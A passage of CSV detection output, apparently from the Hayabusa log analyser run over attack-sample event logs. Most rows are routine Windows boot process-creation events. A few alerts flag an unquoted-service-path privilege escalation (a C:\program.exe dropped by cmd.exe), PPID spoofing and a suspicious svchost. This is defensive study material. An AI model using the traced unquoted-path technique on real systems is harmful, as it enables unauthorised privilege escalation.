Evasion/sysmon_10_1_ppid_spoofing.evtx 2020-03-22 06:45:16.765 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4792 | PGUID: 747F3D96-8AEC-5E76-0000-0010AAE38003,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx 2020-04-26 07:18:47.143 +09:00,MSEDGEWIN10,11,high,Persis,Creation Exe for Service with Unquoted Path,,../hayabusa-rules/sigma/file_event/win_fe_creation_unquoted_service_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:18:47.143 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - Potential PrivEsc via unquoted Service | Path: C:\program.exe | Process: C:\Windows\system32\cmd.exe | PID: 5712 | PGUID: 747F3D96-B521-5EA4-0000-00108C171300,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:00.308 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x4 /state0:0xa38bd055 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 6244 | PGUID: 747F3D96-B754-5EA4-0000-00104F0A2500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 4484 | PGUID: 747F3D96-B755-5EA4-0000-0010D06E2500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:20.134 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 300 | PGUID: 747F3D96-B75F-5EA4-0000-0010622C0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:22.312 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \??\C:\Windows\system32\autochk.exe * | Process: C:\Windows\System32\autochk.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 328 | PGUID: 747F3D96-B762-5EA4-0000-00108B3C0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:22.596 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 388 | PGUID: 747F3D96-B763-5EA4-0000-00106A480000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:22.630 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | LID: 0x3e7 | PID: 396 | PGUID: 747F3D96-B763-5EA4-0000-001034490000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:23.220 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 460 | PGUID: 747F3D96-B764-5EA4-0000-0010794D0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:23.222 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | LID: 0x3e7 | PID: 468 | PGUID: 747F3D96-B764-5EA4-0000-0010904D0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:23.224 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | LID: 0x3e7 | PID: 476 | PGUID: 747F3D96-B764-5EA4-0000-0010714E0000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:23.876 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | LID: 0x3e7 | PID: 568 | PGUID: 747F3D96-B764-5EA4-0000-001096530000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:24.049 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 584 | PGUID: 747F3D96-B764-5EA4-0000-00106F550000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:24.054 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 616 | PGUID: 747F3D96-B764-5EA4-0000-001075590000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:24.188 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 732 | PGUID: 747F3D96-B764-5EA4-0000-00105B6C0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:24.194 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 808 | PGUID: 747F3D96-B764-5EA4-0000-0010FE6F0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.198 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x2 /state0:0xa3b08855 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 992 | PGUID: 747F3D96-B764-5EA4-0000-0010DEBF0000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.211 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""dwm.exe"" | Process: C:\Windows\System32\dwm.exe | User: Window Manager\DWM-1 | Parent Cmd: winlogon.exe | LID: 0xbff6 | PID: 1000 | PGUID: 747F3D96-B764-5EA4-0000-001035C00000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.225 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1020 | PGUID: 747F3D96-B764-5EA4-0000-00105FC20000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.418 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 636 | PGUID: 747F3D96-B764-5EA4-0000-0010EAC90000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.432 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1104 | PGUID: 747F3D96-B764-5EA4-0000-0010A5D20000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.482 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1156 | PGUID: 747F3D96-B765-5EA4-0000-001032D70000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.485 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1212 | PGUID: 747F3D96-B765-5EA4-0000-001089DD0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.487 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1240 | PGUID: 747F3D96-B765-5EA4-0000-0010DCDF0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.600 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1308 | PGUID: 747F3D96-B765-5EA4-0000-00109FE80000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.603 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1360 | PGUID: 747F3D96-B765-5EA4-0000-00104FEE0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.158 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\Upfc.exe /launchtype boot /cv pVnjz5d3jkOKEwXZiJ9/ng.0 | Process: C:\Windows\System32\upfc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1380 | PGUID: 747F3D96-B765-5EA4-0000-00107DF10000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.303 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 1500 | PGUID: 747F3D96-B765-5EA4-0000-0010EDFC0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.507 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 1536 | PGUID: 747F3D96-B765-5EA4-0000-001055010100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.536 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1616 | PGUID: 747F3D96-B765-5EA4-0000-0010550A0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.540 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1624 | PGUID: 747F3D96-B765-5EA4-0000-00108B0A0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.542 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1640 | PGUID: 747F3D96-B765-5EA4-0000-0010EA0A0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.558 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1676 | PGUID: 747F3D96-B765-5EA4-0000-00102B0F0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.632 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1780 | PGUID: 747F3D96-B765-5EA4-0000-001028190100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.635 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\dxgiadaptercache.exe | Process: C:\Windows\System32\dxgiadaptercache.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x3e7 | PID: 1876 | PGUID: 747F3D96-B765-5EA4-0000-0010831F0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.642 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1912 | PGUID: 747F3D96-B765-5EA4-0000-00109B240100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.643 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1920 | PGUID: 747F3D96-B765-5EA4-0000-001031250100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.645 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1936 | PGUID: 747F3D96-B765-5EA4-0000-0010BE260100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:26.652 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1996 | PGUID: 747F3D96-B765-5EA4-0000-0010572D0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:27.196 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1440 | PGUID: 747F3D96-B765-5EA4-0000-00107A380100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:27.198 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1552 | PGUID: 747F3D96-B765-5EA4-0000-00100B390100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:27.473 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2076 | PGUID: 747F3D96-B765-5EA4-0000-0010AA430100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:27.481 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20200425_221917_750.etl | Process: C:\Windows\System32\svchost.exe | PID: 2056 | PGUID: 747F3D96-B765-5EA4-0000-00106B420100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:27.484 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2204 | PGUID: 747F3D96-B765-5EA4-0000-0010344D0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:27.583 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2364 | PGUID: 747F3D96-B765-5EA4-0000-001016620100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:27.764 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2408 | PGUID: 747F3D96-B766-5EA4-0000-0010C4680100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:27.836 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetSvcs -p -s iphlpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2476 | PGUID: 747F3D96-B766-5EA4-0000-0010366F0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:27.838 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2488 | PGUID: 747F3D96-B766-5EA4-0000-001019700100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:27.855 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2496 | PGUID: 747F3D96-B766-5EA4-0000-001046700100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:27.970 